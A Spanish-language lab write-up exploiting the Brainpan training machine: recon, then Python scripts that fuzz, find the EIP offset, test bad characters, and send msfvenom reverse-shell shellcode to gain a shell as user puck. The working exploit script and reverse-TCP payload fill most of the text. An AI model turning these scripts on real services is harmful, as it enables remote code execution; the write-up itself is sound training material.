# Brainpan

Tenemos una máquina en la que vamos a poder prácticar un ataque de tipo **Buffer Overflow**.

### Escaneo de puertos inicial

```ssh

root@kali:~/Desktop/BufferOverflow/Brainpan-1# nmap -sT -T4 -O 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2018-11-23 13:10 CET
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.0029s latency).
Not shown: 998 closed ports
PORT      STATE SERVICE
9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt
MAC Address: 08:00:27:41:B1:7B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.33 seconds
```

Observamos 2 puertos abiertos: **9999** y **10000**.

Accediendo al puerto 10000, observamos un portal web:

![Foto-PortalWeb](https://gitlab.com/NaY0/brainpan1/raw/master/images/1.png)

Tras no sacar nada en claro ni del front ni del código fuente, lanzamos un **dirb**:

```ssh
root@kali:~/Desktop/BufferOverflow/Brainpan-1# dirb http://192.168.56.101:10000/ /usr/share/wordlists/dirb/common.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Nov 24 09:10:27 2018
URL_BASE: http://192.168.56.101:10000/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.101:10000/ ----
+ http://192.168.56.101:10000/bin (CODE:301|SIZE:0)                            
+ http://192.168.56.101:10000/index.html (CODE:200|SIZE:215)                   
                                                                               
-----------------
END_TIME: Sat Nov 24 09:11:15 2018
DOWNLOADED: 4612 - FOUND: 2

```

Bien, obtenemos un directorio interno */bin*:

![Foto-DirectorioBin](https://gitlab.com/NaY0/brainpan1/raw/master/images/2.png)


Tenemos un ejecutable .exe, lo analizamos con **file**:

```ssh
root@kali:~/Desktop/BufferOverflow/Brainpan-1# file brainpan.exe 
brainpan.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
```

Tenemos un ejecutable de 32 bits. Vamos a analizar el puerto 99999. Accediendo a través del navegador vemos una página estática:

![Foto-WebPuerto9999](https://gitlab.com/NaY0/brainpan1/raw/master/images/3.png)

Intentamos conectarnos vía TELNET o NETCAT:

```ssh
root@kali:~/Desktop/BufferOverflow/Brainpan-1# telnet 192.168.56.101 9999
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
_|                            _|                                        
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                          
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                              

                          >> test
                          ACCESS DENIED
Connection closed by foreign host.
```

Tenemos un programa que nos pide introducir una contraseña para acceder.

Vamos a intentar explotar el Buffer Overflow a la hora de introducir este dato.

## 1º Sync Immunity Debugger

Abrimos el ejecutable descargado con *Immunity Debugger*, ya que es el mismo ejecutable que está corriendo en el puerto 9999 de nuestra máquina.


Y lo lanzamos (Run ó F9):

![Foto-ImmunityDebugger-FirstRun](https://gitlab.com/NaY0/brainpan1/raw/master/images/4.png)

Ahora que tenemos el servicio escuchando, pasamos a las diferentes fases de la explotación del Buffer Overflow.

(En mi caso, he abierto Immunity Debugger con la propia máquina Kali desde donde voy a realizar las pruebas, por lo que el servicio correrá en mi localhost en el puerto 9999)


## 1º Fuzzing

Este primer paso trata de descubrir si se produce un desbordamiento en el Buffer, para ello generamos un script en python como el siguiente:

```ssh
#!/usr/bin/python
# coding: utf-8

import sys,socket

if len(sys.argv) != 2:
        print "\nUso: python" + sys.argv[0] + " <dirección-ip>\n"
        sys.exit(0)

buffer = ["A"]
ipAddress = sys.argv[1]
port = 9999
contador = 100

while len(buffer) < 30:
        buffer.append("A"*contador)
        contador += 200

for strings in buffer:
        try:
                print "Enviando %s bytes..." % len(strings)
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ipAddress, port))
                s.recv(1024)
                s.send(strings + '\r\n')
                s.recv(1024)
                s.close()
        except:
                print "\nError de conexión...\n"
sys.exit(0)
```
Este script almacena en la variable Buffer el carácter **"A"** en 30 ocasiones. En la primera iteración guarda 1 carácter, en la siguiente 100, y en el resto va incrementando en más 200 por cada iteración, es decir, **["A", 100 "A", 300 "A", 500 "A" ...]**.

Una vez configurado y entendido este primer script, lo ejecutamos sobre **127.0.0.1**:

```ssh
root@kali:~/Desktop/BufferOverflow/Brainpan-1# python fuzzing.py 127.0.0.1
Enviando 1 bytes...
Enviando 100 bytes...
Enviando 300 bytes...
Enviando 500 bytes...
Enviando 700 bytes...


```

En este punto, vamos a nuestro Immunity Debugger porque se ha tenido que producir la violación de segmento, para ello el registro **EIP** tiene que tomar el valor correspondiente a los caracteres "A" en hexadecimal, es decir, 41414141 (0x41414141) correspondiente a los 32 bits del registro EIP.

![Foto-SegmentViolation](https://gitlab.com/NaY0/brainpan1/raw/master/images/5.png)

Como nuestro fuzzer ha parado en 700 bytes, vamos a enviar 900 bytes para así tener una idea aproximada de cuanto es el tamaño del Buffer. Modificamos el script:

```ssh
#!/usr/bin/python
# coding: utf-8

import sys,socket

if len(sys.argv) != 2:
        print "\nUso: python" + sys.argv[0] + " <dirección-ip>\n"
        sys.exit(0)

buffer = "A"*900
ipAddress = sys.argv[1]
port = 9999

try:
        print "Enviando búffer..."
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ipAddress, port))
        s.recv(1024)
        s.send(buffer + '\r\n')
        s.recv(1024)
        s.close()
except:
        print "\nError de conexión...\n"
        sys.exit(0)

```
Efectivamente si lo ejecutamos, se produce el desbordamiento:

```ssh
root@kali:~/Desktop/BufferOverflow/Brainpan-1# python fuzzing2.py 127.0.0.1
Enviando búffer...

```


**¿Qué se pretende ver con este paso?**
Pues simplemente hemos conseguido que el puntero del programa (EIP) apunte a una "dirección" que hemos introducido nosotros (41414141), en este caso de prueba, pero que conociendo el punto en el que se produce este desbordamiento, podremos hacer que apunte a donde queramos.

## 2º Cálculo del Offset
Ahora es cuando vamos a ver el tamaño del buffer real, ya que enviando "A" no se concreta nada. Para ellos utilizamos las siguientes funcionalidades de **Metasploit**:

- *pattern_create.rb*
- *pattern_offset.rb*

### 1. pattern_create
Permite generar un número aleatorio de caracteres en base a una longitud fija que introducimos:

```ssh
root@kali:~/Desktop/BufferOverflow/Brainpan-1# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 900
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9

```

Sustituimos este valor obtenido en el script anterior:

```ssh
#!/usr/bin/python
# coding: utf-8

import sys,socket

if len(sys.argv) != 2:
        print "\nUso: python" + sys.argv[0] + " <dirección-ip>\n"
        sys.exit(0)

buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9"
ipAddress = sys.argv[1]
port = 9999

try:
        print "Enviando búffer..."
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ipAddress, port))
        s.recv(1024)
        s.send(buffer + '\r\n')
        s.recv(1024)
        s.close()
except:
        print "\nError de conexión...\n"
        sys.exit(0)
```

Ejecutamos el script y vemos el valor que toma EIP:

![Foto-ValorEIP](https://gitlab.com/NaY0/brainpan1/raw/master/images/6.png)

EIP = 35724134

Pasamos este valor hexadecimal a ASCII con el fin de ver con que caracteres de nuestra variable buffer corresponden:

0x35724134 = 5rA4

Hacemos la inversa --> **4Ar5**

### 2. pattern_offset
 
Seguidamente utilizamos pattern_offset para calcular el offset del valor obtenido con anterioridad:


```ssh
root@kali:~/Desktop/BufferOverflow/Brainpan-1# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 4Ar5
[*] Exact match at offset 524

```

## 3º Control del registro EIP

Una vez que hemos descubierto el offset, es hora de controlar el valor que puede tomar el puntero. Para ello podemos generar el siguiente script, donde vamos a hacer que EIP tome el valor "B":


```ssh
#!/usr/bin/python
# coding: utf-8

import sys,socket

if len(sys.argv) != 2:
        print "\nUso: python" + sys.argv[0] + " <dirección-ip>\n"
        sys.exit(0)

buffer = "A"*524 + "B"*4 + "C"*(900-524-4)
ipAddress = sys.argv[1]
port = 9999

try:
        print "Enviando búffer..."
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ipAddress, port))
        s.recv(1024)
        s.send(buffer + '\r\n')
        s.recv(1024)
        s.close()
except:
        print "\nError de conexión...\n"
        sys.exit(0)
```

Efectivamente el registro EIP toma el valor 42424242.
El caracter "C" se usa de Padding (relleno) y es el valor que toma el registro ESP.

![Foto-ControlandoEIP](https://gitlab.com/NaY0/brainpan1/raw/master/images/7.png)

Ya tenemos el lugar donde vamos a introducir nuestro Shellcode!
Además, no hace falta aumentar el relleno, ya que disponemos un total de 900-524-4 bytes (372 bytes). 

**NOTA**: cabe la posibilidad de que en cierta ocasión no dispongamos de tanto tamaño de relleno para un shellcode (351 bytes desde msfvenom para Windows y 95 bytes para Linux). Por tanto bastaría con modificar el script aumentando el tamaño de las "C".

## 4º Detección de Badchars ("bad characters")

Partimos de la siguiente estructura de datos (todos los datos que puede generar msfvenom con nuestro shellcode):
```
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
```

El objetivo de esta fase es determinar si el servicio acepta todos estos caracteres o por el contrario hay alguno que no está permitido.

Por tanto, modificamos el script anterior para que estos datos se carguen en el relleno y ver cuales acepta y cuales no:

```ssh
#!/usr/bin/python
# coding: utf-8

import sys,socket

if len(sys.argv) != 2:
        print "\nUso: python" + sys.argv[0] + " <dirección-ip>\n"
        sys.exit(0)
badchars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

buffer = "A"*524 + "B"*4 + badchars + "C"*(900-524-4-255)
ipAddress = sys.argv[1]
port = 9999

try:
        print "Enviando búffer..."
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ipAddress, port))
        s.recv(1024)
        s.send(buffer + '\r\n')
        s.recv(1024)
        s.close()
except:
        print "\nError de conexión...\n"
        sys.exit(0)
```

Lo ejecutamos y vamos a ver los valores que toma ESP. Valor que no coja de los introducidos, valor que habrá que desechar a la hora de generar el shellcode:

![Foto-Badchars](https://gitlab.com/NaY0/brainpan1/raw/master/images/8.png)

En este caso, nos ha aceptado todos menos **x00**.

## 5º Generación del Shellcode
Ejecutamos **msfvenom** para generar el shellcode:

```ssh
root@kali:~/Desktop/BufferOverflow/Brainpan-1# msfvenom -p linux/x86/shell/reverse_tcp -b "\x00" LHOST=192.168.56.100 LPORT=4444 -f python
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 150 (iteration=0)
x86/shikata_ga_nai chosen with final size 150
Payload size: 150 bytes
Final size of python file: 730 bytes
buf =  ""
buf += "\xba\x4e\xd4\xdb\x14\xdb\xde\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x1f\x31\x55\x15\x03\x55\x15\x83\xc5\x04\xe2"
buf += "\xbb\xbe\xd1\x4a\x72\xe4\x11\x91\x27\x59\x8d\x3c\xc5"
buf += "\xed\x57\x48\x28\xc0\x18\xdd\xf1\xb3\xd8\x4a\x3d\x20"
buf += "\xb1\x88\x3d\xb9\x1d\x04\xdc\xd3\xfb\x4e\x4e\x75\x53"
buf += "\xe6\x8f\x36\x96\x78\xca\x79\x51\x60\x9a\x0d\x9f\xfa"
buf += "\x80\xee\xdf\xfa\x9c\x84\xdf\x90\x19\xd0\x03\x55\xe8"
buf += "\x2f\x43\x13\x2a\xd6\xf9\xf7\x8d\x9b\x05\xb1\xd1\xcb"
buf += "\x09\xc1\x58\x08\xc8\x2a\x56\x0e\x28\xa0\xd6\xed\x62"
buf += "\x39\x93\xce\x05\x2a\xc0\x47\x14\xd3\x40\x5b\x67\xe7"
buf += "\x61\xe4\x02\x28\x01\xe7\xf3\x48\x49\xe6\x0b\x8b\xa9"
buf += "\x52\x0a\x8b\xa9\xa4\xc0\x0b"
```

Lo añadimos al script:

```ssh
#!/usr/bin/python
# coding: utf-8

import sys,socket

if len(sys.argv) != 2:
        print "\nUso: python" + sys.argv[0] + " <dirección-ip>\n"
        sys.exit(0)
buf =  ""
buf += "\xba\x4e\xd4\xdb\x14\xdb\xde\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x1f\x31\x55\x15\x03\x55\x15\x83\xc5\x04\xe2"
buf += "\xbb\xbe\xd1\x4a\x72\xe4\x11\x91\x27\x59\x8d\x3c\xc5"
buf += "\xed\x57\x48\x28\xc0\x18\xdd\xf1\xb3\xd8\x4a\x3d\x20"
buf += "\xb1\x88\x3d\xb9\x1d\x04\xdc\xd3\xfb\x4e\x4e\x75\x53"
buf += "\xe6\x8f\x36\x96\x78\xca\x79\x51\x60\x9a\x0d\x9f\xfa"
buf += "\x80\xee\xdf\xfa\x9c\x84\xdf\x90\x19\xd0\x03\x55\xe8"
buf += "\x2f\x43\x13\x2a\xd6\xf9\xf7\x8d\x9b\x05\xb1\xd1\xcb"
buf += "\x09\xc1\x58\x08\xc8\x2a\x56\x0e\x28\xa0\xd6\xed\x62"
buf += "\x39\x93\xce\x05\x2a\xc0\x47\x14\xd3\x40\x5b\x67\xe7"
buf += "\x61\xe4\x02\x28\x01\xe7\xf3\x48\x49\xe6\x0b\x8b\xa9"
buf += "\x52\x0a\x8b\xa9\xa4\xc0\x0b"

buffer = "A"*524 + "B"*4 + "\x90"*16 + buf + "C"*(900-524-4-16-95)
ipAddress = sys.argv[1]
port = 9999

try:
        print "Enviando búffer..."
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ipAddress, port))
        s.recv(1024)
        s.send(buffer + '\r\n')
        s.recv(1024)
        s.close()
except:
        print "\nError de conexión...\n"
        sys.exit(0)
```

OJO, se añaden 16 bytes de NOP para dar tiempo a que el shellcode sea descifrado antes de ser interpretado.

## 6º Apuntar a ESP
Teniendo el control de EIP y nuestro shellcode en ESP, el siguiente paso es hacer que el registro EIP apunte a ESP para que se ejecute el shellcode.

Hay que buscar una dirección de memoria con permisos de ejecución y que tenga ASLR desactivado y que se aplique una instrucción del tipo **jmp ESP**.

Utilizamos **mona.py** desde la línea de comandos de Immunity Debugger (si no está instalada hay que descagar el script de GitHub y copiarlo en la carpeta PyCommands en el directorio de ImmunityDebugger).

Ejecutamos:

```ssh
mona! modules
``` 

El resultado es el siguiente:

![Foto-MonaModules](https://gitlab.com/NaY0/brainpan1/raw/master/images/9.png)

Esta opción es recomendable cuando se cargan diferentes módulos (por ejemplo la máquina del examen del OSCP). Si solo tenemos uno, como es el caso, podemos ejecutar:

```ssh
!mona jmp -r esp -cpb "\x00\x0A"
```

![Foto-MonaModules2](https://gitlab.com/NaY0/brainpan1/raw/master/images/10.png)

![Foto-JMP-ESP](https://gitlab.com/NaY0/brainpan1/raw/master/images/11.png)

Tenemos la dirección de memoria (0x311712F3) que nos dará el salto a ESP, así que hay que colocar este valor en el registro EIP.

Por lo tanto, editamos el script:

```ssh
#!/usr/bin/python
# coding: utf-8

import sys,socket

if len(sys.argv) != 2:
        print "\nUso: python" + sys.argv[0] + " <dirección-ip>\n"
        sys.exit(0)
buf =  ""
buf += "\xba\x4e\xd4\xdb\x14\xdb\xde\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x1f\x31\x55\x15\x03\x55\x15\x83\xc5\x04\xe2"
buf += "\xbb\xbe\xd1\x4a\x72\xe4\x11\x91\x27\x59\x8d\x3c\xc5"
buf += "\xed\x57\x48\x28\xc0\x18\xdd\xf1\xb3\xd8\x4a\x3d\x20"
buf += "\xb1\x88\x3d\xb9\x1d\x04\xdc\xd3\xfb\x4e\x4e\x75\x53"
buf += "\xe6\x8f\x36\x96\x78\xca\x79\x51\x60\x9a\x0d\x9f\xfa"
buf += "\x80\xee\xdf\xfa\x9c\x84\xdf\x90\x19\xd0\x03\x55\xe8"
buf += "\x2f\x43\x13\x2a\xd6\xf9\xf7\x8d\x9b\x05\xb1\xd1\xcb"
buf += "\x09\xc1\x58\x08\xc8\x2a\x56\x0e\x28\xa0\xd6\xed\x62"
buf += "\x39\x93\xce\x05\x2a\xc0\x47\x14\xd3\x40\x5b\x67\xe7"
buf += "\x61\xe4\x02\x28\x01\xe7\xf3\x48\x49\xe6\x0b\x8b\xa9"
buf += "\x52\x0a\x8b\xa9\xa4\xc0\x0b"

buffer = "A"*524 + "\xf3\x12\x17\x31" + "\x90"*16 + buf + "C"*(900-524-4-16-95)
ipAddress = sys.argv[1]
port = 9999

try:
        print "Enviando búffer..."
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ipAddress, port))
        s.recv(1024)
        s.send(buffer + '\r\n')
        s.recv(1024)
        s.close()
except:
        print "\nError de conexión...\n"
        sys.exit(0)
```

## 7º Explotación

Ahora únicamente ponemos el puerto 4444 a la escucha con NETCAT o utilizando METASPLOIT y lanzamos nuestro script:

```ssh
python LinuxShellcode.py 192.168.56.102
Enviando búffer...

```

La sesión se inicia satisfactoriamente:

```ssh
msf exploit(handler) > [*] Sending stage (36 bytes) to 192.168.56.102
[*] Command shell session 1 opened (192.168.56.100:4444 -> 192.168.56.102:48246) at 2018-11-24 19:44:31 +0100
whoami
puck

ls
checksrv.sh
web

```